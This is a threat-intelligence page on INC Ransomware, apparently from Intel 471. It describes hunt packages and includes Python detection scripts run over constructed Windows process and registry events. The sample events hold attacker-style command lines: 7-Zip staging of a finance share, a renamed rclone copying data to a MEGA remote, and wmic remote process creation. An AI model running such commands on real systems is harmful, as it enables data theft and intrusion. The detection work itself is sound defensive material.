INC Ransomware | Intel 471

INC Ransomware

Sep 05, 2024

Threat Overview - INC Ransomware

INC Ransomware is a ransomware family first observed in July/August 2023 that has since been involved in major disruptions, mostly in North America and Europe. In August 2024 the group was tied to an attack on the healthcare network McLaren Health Care that disrupted IT infrastructure, devices and phone systems. The threat group, which goes by the same name as the ransomware (INC Ransom), is financially motivated and uses double extortion: after encrypting targeted systems it threatens to publicly release proprietary data exfiltrated beforehand if the victim does not meet its demands. The techniques used by INC Ransomware mirror those of other ransomware families, with comparable approaches to initial access, reconnaissance, lateral movement and, ultimately, encryption of the systems. The Lynx ransomware, newly observed in July 2024, is suspected to be a fork of the INC Ransomware code base. INC Ransomware is considered an active threat and therefore a significant, present risk that organizations should assess and prepare for.


Hunt Packages

7-zip Archive Collection with File Exclusions

This Threat Hunt package identifies malicious activity in which attackers leverage 7-Zip to collect and compress files prior to exfiltration. The method selectively includes files of interest while excluding common, non-sensitive file types such as executables, videos and virtual disk files. By combining 7-Zip's compression with exclusion filters, adversaries gather only critical or high-value data for exfiltration while avoiding files that would attract attention or bloat the payload. This tactic highlights the importance of monitoring file compression activity, especially when certain file types are deliberately excluded.


First Time Script Or Sysinternals Execution - Registry Key Modification

This package is designed to capture the first-time execution of scripts and Sysinternals executables. The first time most Sysinternals programs (and some scripts) are run, the user must accept the End User License Agreement. This can be done in two ways: 1) pass the -accepteula command-line argument, or 2) click Agree when the pop-up prompts. Either way, a registry value is written to record the acceptance so that the prompt does not appear on subsequent runs; that registry modification is what the hunt keys on.
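The registry write described above, as an added example that is not part of the hunt package: for Sysinternals tools the value is HKCU\Software\Sysinternals\<Tool>\EulaAccepted (DWORD 1), which Sysmon Event ID 13 (RegistryEvent, value set) reports with the current-user hive rendered as HKU\<SID>. The event fields, SIDs and baseline set are constructed for the example; the script-side key the package also covers is not shown.

```python
# Added example (not Intel 471's hunt package logic): first-time Sysinternals
# execution found through the EULA-acceptance registry write. Whether the EULA is
# accepted with -accepteula or by clicking the prompt, the tool sets
# HKCU\Software\Sysinternals\<Tool>\EulaAccepted = 1. Sysmon Event ID 13 renders
# HKCU as HKU\<SID>, so the path is matched on its tail. All events below are
# constructed for this example, not real telemetry.
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class RegEvent:
    event_id: str
    computer: str
    user: str
    image: str          # process that wrote the value
    target_object: str  # registry path as Sysmon reports it
    details: str        # e.g. "DWORD (0x00000001)"

EULA_KEY = re.compile(r"\\software\\sysinternals\\(?P<tool>[^\\]+)\\eulaaccepted$", re.IGNORECASE)

def eula_acceptance(ev):
    """Return the Sysinternals tool name if this value-set event records EulaAccepted=1."""
    m = EULA_KEY.search(ev.target_object)
    if m is None or "0x00000001" not in ev.details.lower():
        return None
    return m.group("tool")

def first_time_executions(events, baseline=()):
    """Flag EULA acceptances for (host, user, tool) triples not seen before.

    `baseline` holds triples already known from earlier hunts or an allow-list;
    repeats of the same triple within `events` are reported once. Each hit keeps
    the writing image: a value written by reg.exe rather than by the tool itself
    suggests someone pre-seeding the key to avoid the prompt, which deserves a look."""
    seen = set(baseline)
    hits = []
    for ev in events:
        tool = eula_acceptance(ev)
        if tool is None:
            continue
        key = (ev.computer.lower(), ev.user.lower(), tool.lower())
        if key in seen:
            continue
        seen.add(key)
        hits.append((ev.event_id, ev.computer, ev.user, tool, ev.image))
    return hits

# Constructed sample events; the SIDs are made up for the example.
SID_BOB = "S-1-5-21-1004336348-1177238915-682003330-1001"
SID_SVC = "S-1-5-21-1004336348-1177238915-682003330-1105"
EVENTS = [
    RegEvent("r1", "WS-042", r"CORP\bob", r"C:\Users\bob\Downloads\PsExec64.exe",
             rf"HKU\{SID_BOB}\Software\Sysinternals\PsExec\EulaAccepted", "DWORD (0x00000001)"),
    RegEvent("r2", "WS-042", r"CORP\bob", r"C:\Windows\System32\reg.exe",  # key pre-seeded by hand
             rf"HKU\{SID_BOB}\Software\Sysinternals\ProcDump\EulaAccepted", "DWORD (0x00000001)"),
    RegEvent("r3", "WS-042", r"CORP\bob", r"C:\Users\bob\Downloads\PsExec64.exe",  # repeat of r1
             rf"HKU\{SID_BOB}\Software\Sysinternals\PsExec\EulaAccepted", "DWORD (0x00000001)"),
    RegEvent("r4", "SRV-01", r"CORP\svc_backup", r"C:\Tools\procdump.exe",  # already baselined
             rf"HKU\{SID_SVC}\Software\Sysinternals\ProcDump\EulaAccepted", "DWORD (0x00000001)"),
    RegEvent("r5", "WS-042", r"CORP\bob", r"C:\Windows\explorer.exe",  # unrelated value set
             rf"HKU\{SID_BOB}\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
             "DWORD (0x00000001)"),
]
BASELINE = {("srv-01", r"corp\svc_backup", "procdump")}

if __name__ == "__main__":
    for event_id, host, user, tool, image in first_time_executions(EVENTS, BASELINE):
        print(f"{event_id}: first {tool} EULA acceptance for {user} on {host} (written by {image})")
```

Keying on the registry write catches both acceptance paths (the -accepteula switch and the GUI click), whereas a process-creation rule on the -accepteula argument alone misses the interactive case; the baseline set is what keeps a noisy administrator workstation from paging you every day.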


Potential Exfiltration - Common Rclone Arguments

This package identifies processes executed with command-line arguments commonly associated with rclone when it is used to exfiltrate data. Because the rclone binary is frequently renamed before use, matching on its arguments rather than its file name is what keeps this hunt effective.


Advanced IP Scanner Tool Utilization

This Threat Hunt package identifies instances where the Advanced IP Scanner tool was used within a target environment; malicious actors may leverage it to perform network discovery. The package also identifies the activity when the tool is run as a portable executable rather than from an installed copy.


Remote WMI Command Attempt

This hunt searches for wmic.exe launched with parameters that operate on remote systems. It can uncover an attacker abusing WMI to execute commands remotely or simply to gather information about other hosts.


Remote Process Instantiation via WMI

This use case identifies wmic.exe launched with parameters that spawn a process on a remote system.


MEGA Sync Installation

This Threat Hunt package identifies instances where MEGA Sync installations are present within a target environment, which malicious actors may leverage to exfiltrate sensitive data. MEGA Sync, a cloud storage synchronization tool, can be abused by adversaries to quietly transfer files from compromised systems to external MEGA accounts, bypassing traditional security controls. This package focuses on detecting unauthorized installations and configurations of MEGA Sync that could indicate active or potential data exfiltration activity.
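An added example (not Intel 471's hunt package content) that runs the command-line hunts described above (7-Zip with file exclusions, common rclone arguments, Advanced IP Scanner, remote WMI commands, remote process instantiation via WMI and MEGA Sync installation) in one pass over constructed Sysmon Event ID 1-style process-creation events. The rclone flag set, the Advanced IP Scanner and MEGA file names and every event are assumptions made for the example; the field names follow Sysmon (Image, CommandLine, OriginalFileName).

```python
# Added example (not Intel 471's hunt package logic): a single pass over Windows
# process-creation events that implements the command-line hunts described above.
# Field names follow Sysmon Event ID 1 (Image, CommandLine, OriginalFileName);
# every event in EVENTS is constructed for this example, not real telemetry.
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    event_id: str
    image: str                    # full path of the executable that started
    command_line: str
    original_file_name: str = ""  # name from the PE version info; survives renaming

def tokens(cmdline):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

SEVENZIP_IMAGES = {"7z.exe", "7za.exe", "7zr.exe", "7zg.exe"}
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto"}
# Flags typical of rclone exfiltration command lines (an assumed set for the example).
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--auto-confirm",
                "--multi-thread-streams", "--no-check-certificate", "--max-age",
                "--progress", "-p"}

def sevenzip_exclusions(ev):
    """7-Zip adding (a) or updating (u) an archive while excluding file types with
    -x!pattern or -xr!pattern switches. Returns the excluded patterns, else None."""
    t = tokens(ev.command_line)
    if basename(ev.image) not in SEVENZIP_IMAGES or len(t) < 2 or t[1].lower() not in {"a", "u"}:
        return None
    excluded = [x.split("!", 1)[1] for x in t[2:] if x.lower().startswith("-x") and "!" in x]
    return excluded or None

def rclone_exfil_args(ev):
    """rclone is routinely renamed, so match on a subcommand plus at least two typical
    flags instead of the image name; OriginalFileName is only corroborating evidence."""
    t = {x.lower() for x in tokens(ev.command_line)}
    return bool(t & RCLONE_SUBCOMMANDS) and len(t & RCLONE_FLAGS) >= 2

def advanced_ip_scanner(ev):
    """Installed, portable or console build, by file name or PE name (assumes the
    OriginalFileName field carries advanced_ip_scanner.exe)."""
    names = (basename(ev.image), ev.original_file_name.lower())
    return any("advanced_ip_scanner" in n for n in names)

def wmic_remote(ev):
    """wmic.exe pointed at another host with /node:<host>."""
    return basename(ev.image) == "wmic.exe" and any(
        x.lower().startswith("/node:") for x in tokens(ev.command_line))

def wmic_remote_process_create(ev):
    """Remote process creation: /node:<host> process call create "<command>"."""
    t = [x.lower() for x in tokens(ev.command_line)]
    return wmic_remote(ev) and all(w in t for w in ("process", "call", "create"))

def mega_install(ev):
    """MEGAsync installer or client (assumed file names MEGAsyncSetup*.exe, MEGAsync.exe)."""
    names = (basename(ev.image), ev.original_file_name.lower())
    return any(n.startswith("megasync") for n in names)

RULES = [
    ("7-zip Archive Collection with File Exclusions", lambda ev: sevenzip_exclusions(ev) is not None),
    ("Potential Exfiltration - Common Rclone Arguments", rclone_exfil_args),
    ("Advanced IP Scanner Tool Utilization", advanced_ip_scanner),
    ("Remote WMI Command Attempt", wmic_remote),
    ("Remote Process Instantiation via WMI", wmic_remote_process_create),
    ("MEGA Sync Installation", mega_install),
]

def hunt(events):
    """Return (event_id, hunt name) for every rule each event triggers."""
    return [(ev.event_id, name) for ev in events for name, rule in RULES if rule(ev)]

# Constructed sample events: e1 to e6 mimic the hunted behaviours, e7 and e8 are benign.
EVENTS = [
    ProcEvent("e1", r"C:\Windows\Temp\7z.exe",
              r"7z.exe a -mx1 -r C:\Windows\Temp\fin.7z \\FS01\Finance -x!*.exe -x!*.dll -x!*.mp4 -xr!*.vmdk -x!*.iso"),
    ProcEvent("e2", r"C:\ProgramData\svchost.exe",  # rclone renamed to blend in
              r"svchost.exe copy C:\Windows\Temp\fin.7z mega:backup --config C:\ProgramData\rc.conf --transfers 32 --ignore-existing -P",
              original_file_name="rclone.exe"),
    ProcEvent("e3", r"C:\Users\bob\AppData\Local\Temp\Advanced_IP_Scanner_2.5.4594.1.exe",
              r'"C:\Users\bob\AppData\Local\Temp\Advanced_IP_Scanner_2.5.4594.1.exe"',
              original_file_name="advanced_ip_scanner.exe"),
    ProcEvent("e4", r"C:\Windows\System32\wbem\wmic.exe", r'wmic.exe /node:"FS01" /user:corp\admin os get caption'),
    ProcEvent("e5", r"C:\Windows\System32\wbem\wmic.exe",
              r'wmic.exe /node:10.1.2.3 process call create "cmd.exe /c whoami > C:\Windows\Temp\w.txt"'),
    ProcEvent("e6", r"C:\Users\bob\Downloads\MEGAsyncSetup64.exe", r'"C:\Users\bob\Downloads\MEGAsyncSetup64.exe"'),
    ProcEvent("e7", r"C:\Program Files\7-Zip\7z.exe", r"7z.exe x C:\Users\bob\Downloads\tools.zip -oC:\tools"),
    ProcEvent("e8", r"C:\Windows\System32\wbem\wmic.exe", r"wmic.exe os get caption"),
]

if __name__ == "__main__":
    for event_id, name in hunt(EVENTS):
        print(f"{event_id}: {name}")
```

Two design points carry over to a real SIEM query: the rclone rule fires on e2 even though the binary was renamed to svchost.exe, because it matches the subcommand and flags rather than the image, and the 7-Zip rule only fires on archive creation or update with exclusion switches, so a plain extraction like e7 stays quiet. The remote WMI process-creation rule is a strict subset of the remote WMI rule, which is why e5 appears under both names.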

